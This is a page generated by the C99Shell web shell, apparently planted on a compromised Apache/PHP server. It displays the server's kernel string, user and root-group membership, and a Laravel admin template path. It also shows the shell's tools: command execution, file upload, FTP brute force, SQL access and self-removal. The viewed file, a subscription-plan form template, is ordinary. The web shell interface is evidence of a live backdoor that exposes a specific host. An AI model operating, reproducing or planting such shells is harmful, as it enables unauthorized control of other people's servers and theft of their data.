!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/inventory.picotech.app/public_html/resources/views/admin/plans/   drwxr-xr-x
Free 28.78 GB of 117.98 GB (24.39%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     form.blade.php (2.36 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="card-body">
    <div class="form-group">
        <label for="title">Title </label>
        <input value="{{isset($plan)?$plan->title:''}}" name="title" type="text" class="form-control" id="title" placeholder="Title">
    </div>
    <div class="form-group">
        <label for="cost">Plan Cost</label>
        <input value="{{isset($plan)?$plan->cost:''}}" name="cost" type="text" class="form-control" id="cost" placeholder="Plan Cost">
    </div>
    <div class="form-group">
        <label for="sms_limit">Sms Limit</label>
        <input value="{{isset($plan)?$plan->sms_limit:''}}" name="sms_limit" type="number" class="form-control" id="sms_limit" placeholder="Sms Limit">
    </div>
    <div class="form-group">
        <label for="recurring_type">Recurring Type</label>
        <select class="form-control" name="recurring_type" id="recurring_type">
            <option {{isset($plan) && $plan->recurring_type=='onetime'?'selected':''}} value="onetime">OneTime</option>
            <option {{isset($plan) && $plan->recurring_type=='weekly'?'selected':''}} value="weekly">Weekly</option>
            <option {{isset($plan) && $plan->recurring_type=='monthly'?'selected':''}} value="monthly">Monthly</option>
            <option {{isset($plan) && $plan->recurring_type=='semiyearly'?'selected':''}} value="semiyearly">SemiYearly</option>
            <option {{isset($plan) && $plan->recurring_type=='yearly'?'selected':''}} value="yearly">Yearly</option>
        </select>
      </div>
    <div class="form-group">
        <label for="roles">Role</label>
        <select id="roles" name="role_id" class="form-control" style="width: 100%;">
            @foreach($roles as $role)
                <option {{isset($plan) && $plan->role_id==$role->id?'selected':''}} value="{{$role->id}}">{{$role->name}}</option>
            @endforeach
        </select>
    </div>

    <div class="form-group">
        <label for="status">Status</label>
        <select id="status" name="status" class="form-control" style="width: 100%;">
            <option {{isset($plan) && $plan->status=='active'?'selected':''}} value="active">Active</option>
            <option {{isset($plan) && $plan->status=='inactive'?'selected':''}} value="inactive">Inactive</option>
        </select>
    </div>

</div>
<!-- /.card-body -->

<div class="card-footer">
    <button type="submit" class="btn btn-primary">Submit</button>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--